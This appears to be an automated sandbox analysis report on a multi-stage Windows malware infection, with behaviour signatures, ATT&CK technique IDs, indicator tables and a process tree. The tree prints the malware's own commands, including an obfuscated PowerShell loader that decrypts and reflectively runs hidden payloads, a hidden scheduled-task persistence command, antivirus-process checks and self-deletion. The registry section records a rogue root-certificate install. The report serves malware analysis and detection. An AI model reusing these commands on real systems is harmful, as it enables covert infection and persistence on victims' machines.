Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	svhoost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	svhoost.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4612	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
1152	explortu.exe
1152	explortu.exe
3572	7ec52fcc46.exe
3572	7ec52fcc46.exe
4028	axplont.exe
4028	axplont.exe
4692	One.exe
916	6b4e5c58ea.exe
916	6b4e5c58ea.exe
4084	axplont.exe
4084	axplont.exe
1576	explortu.exe
1576	explortu.exe
1076	RegAsm.exe
1076	RegAsm.exe
3016	svhoost.exe
3016	svhoost.exe
3016	svhoost.exe
3016	svhoost.exe
4236	fileosn.exe
4236	fileosn.exe
4236	fileosn.exe
4236	fileosn.exe
4236	fileosn.exe
4236	fileosn.exe
3016	svhoost.exe
3016	svhoost.exe
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
2152	AddInProcess32.exe
2152	AddInProcess32.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
2420	powershell.exe
2420	powershell.exe
2420	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
2152	AddInProcess32.exe
2152	AddInProcess32.exe
2400	msedge.exe
2400	msedge.exe
5700	msedge.exe
5700	msedge.exe
5512	msedge.exe
5512	msedge.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
5708	axplont.exe
5708	axplont.exe
5372	explortu.exe
5372	explortu.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4692	One.exe
Token: SeBackupPrivilege	4692	One.exe
Token: SeSecurityPrivilege	4692	One.exe
Token: SeSecurityPrivilege	4692	One.exe
Token: SeSecurityPrivilege	4692	One.exe
Token: SeSecurityPrivilege	4692	One.exe
Token: SeDebugPrivilege	4404	file300un.exe
Token: SeManageVolumePrivilege	432	360TS_Setup_Mini_WW.exe
Token: SeDebugPrivilege	1868	regasm.exe
Token: SeDebugPrivilege	1832	a7YGq3H0uFjl3y1aChNJg5jL.exe
Token: SeDebugPrivilege	4236	fileosn.exe
Token: SeDebugPrivilege	3016	svhoost.exe
Token: SeDebugPrivilege	4700	RegAsm.exe
Token: SeDebugPrivilege	2308	tasklist.exe
Token: SeDebugPrivilege	3288	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeDebugPrivilege	3624	tasklist.exe
Token: SeDebugPrivilege	2152	AddInProcess32.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe
Token: 35	3448	WMIC.exe
Token: 36	3448	WMIC.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	3516	tasklist.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeIncreaseQuotaPrivilege	1616	WMIC.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
3572	7ec52fcc46.exe
432	360TS_Setup_Mini_WW.exe
432	360TS_Setup_Mini_WW.exe
432	360TS_Setup_Mini_WW.exe
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
432	360TS_Setup_Mini_WW.exe
432	360TS_Setup_Mini_WW.exe
432	360TS_Setup_Mini_WW.exe
2612	Cruz.pif
2612	Cruz.pif
2612	Cruz.pif
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe
5700	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2152	AddInProcess32.exe
3340	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4748 wrote to memory of 1152	4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe	77
PID 4748 wrote to memory of 1152	4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe	77
PID 4748 wrote to memory of 1152	4748	c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe	77
PID 1152 wrote to memory of 2224	1152	explortu.exe	78
PID 1152 wrote to memory of 2224	1152	explortu.exe	78
PID 1152 wrote to memory of 2224	1152	explortu.exe	78
PID 1152 wrote to memory of 3572	1152	explortu.exe	79
PID 1152 wrote to memory of 3572	1152	explortu.exe	79
PID 1152 wrote to memory of 3572	1152	explortu.exe	79
PID 3572 wrote to memory of 4028	3572	7ec52fcc46.exe	80
PID 3572 wrote to memory of 4028	3572	7ec52fcc46.exe	80
PID 3572 wrote to memory of 4028	3572	7ec52fcc46.exe	80
PID 4028 wrote to memory of 3716	4028	axplont.exe	81
PID 4028 wrote to memory of 3716	4028	axplont.exe	81
PID 4028 wrote to memory of 3716	4028	axplont.exe	81
PID 3716 wrote to memory of 2712	3716	33333.exe	82
PID 3716 wrote to memory of 2712	3716	33333.exe	82
PID 3716 wrote to memory of 2712	3716	33333.exe	82
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 3716 wrote to memory of 4700	3716	33333.exe	83
PID 4700 wrote to memory of 4692	4700	RegAsm.exe	84
PID 4700 wrote to memory of 4692	4700	RegAsm.exe	84
PID 4700 wrote to memory of 3016	4700	RegAsm.exe	85
PID 4700 wrote to memory of 3016	4700	RegAsm.exe	85
PID 4700 wrote to memory of 3016	4700	RegAsm.exe	85
PID 1152 wrote to memory of 916	1152	explortu.exe	92
PID 1152 wrote to memory of 916	1152	explortu.exe	92
PID 1152 wrote to memory of 916	1152	explortu.exe	92
PID 4028 wrote to memory of 4236	4028	axplont.exe	93
PID 4028 wrote to memory of 4236	4028	axplont.exe	93
PID 4028 wrote to memory of 4236	4028	axplont.exe	93
PID 4028 wrote to memory of 1240	4028	axplont.exe	95
PID 4028 wrote to memory of 1240	4028	axplont.exe	95
PID 4028 wrote to memory of 1240	4028	axplont.exe	95
PID 1240 wrote to memory of 1496	1240	lumma1234.exe	97
PID 1240 wrote to memory of 1496	1240	lumma1234.exe	97
PID 1240 wrote to memory of 1496	1240	lumma1234.exe	97
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 1240 wrote to memory of 2676	1240	lumma1234.exe	98
PID 4028 wrote to memory of 3548	4028	axplont.exe	99
PID 4028 wrote to memory of 3548	4028	axplont.exe	99
PID 4028 wrote to memory of 3548	4028	axplont.exe	99
PID 3548 wrote to memory of 4944	3548	gold.exe	100
PID 3548 wrote to memory of 4944	3548	gold.exe	100
PID 3548 wrote to memory of 4944	3548	gold.exe	100
PID 3548 wrote to memory of 3660	3548	gold.exe	101
PID 3548 wrote to memory of 3660	3548	gold.exe	101
PID 3548 wrote to memory of 3660	3548	gold.exe	101
PID 3548 wrote to memory of 636	3548	gold.exe	102
PID 3548 wrote to memory of 636	3548	gold.exe	102
PID 3548 wrote to memory of 636	3548	gold.exe	102

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3076	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3304
- C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe
  "C:\Users\Admin\AppData\Local\Temp\c4579c723a1dc34b48b4684b6d05e1902ac28d007efcb3d96958a92ed963a94f.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      4⤵
      PID:2224
  - - C:\Users\Admin\1000004002\7ec52fcc46.exe
      "C:\Users\Admin\1000004002\7ec52fcc46.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3572
    - - C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4028
      - C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3716
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2712
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4700
        
        C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
        
        C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        8⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 304
        7⤵
        Program crash
        
        PID:1776
      - C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
      - C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1240
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:1496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2676
      - C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3548
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:4944
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:3660
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:636
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 320
        7⤵
        Program crash
        
        PID:2560
      - C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3836
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1076
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
        8⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        9⤵
        Delays execution with timeout.exe
        
        PID:3484
      - C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        7⤵
        
        PID:4072
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
        
        C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe
        
        "C:\Users\Admin\Pictures\4TS3Fy6BMMUZF4kDjwSDYcZ6.exe" /s
        8⤵
        Executes dropped EXE
        
        PID:4500
        
        C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe
        
        "C:\Users\Admin\Pictures\a7YGq3H0uFjl3y1aChNJg5jL.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        9⤵
        
        PID:428
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        9⤵
        
        PID:4732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbuslf.bat" "
        10⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "set __=^&rem"
        11⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\dbuslf.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        11⤵
        
        PID:336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetWindowsHookEx
        
        PID:3340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dbuslf')
        12⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4952
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        9⤵
        
        PID:3068
        
        C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe
        
        "C:\Users\Admin\Pictures\wg2sDWUI4FJX9WOCZzfaJ2SE.exe"
        8⤵
        Executes dropped EXE
        
        PID:5052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
        9⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        10⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3288
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        10⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 400508
        10⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "architectureeditionshowardhabits" Sterling
        10⤵
        
        PID:1136
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Environment + Company + Graduated + Vary 400508\y
        10⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
        
        400508\Cruz.pif 400508\y
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
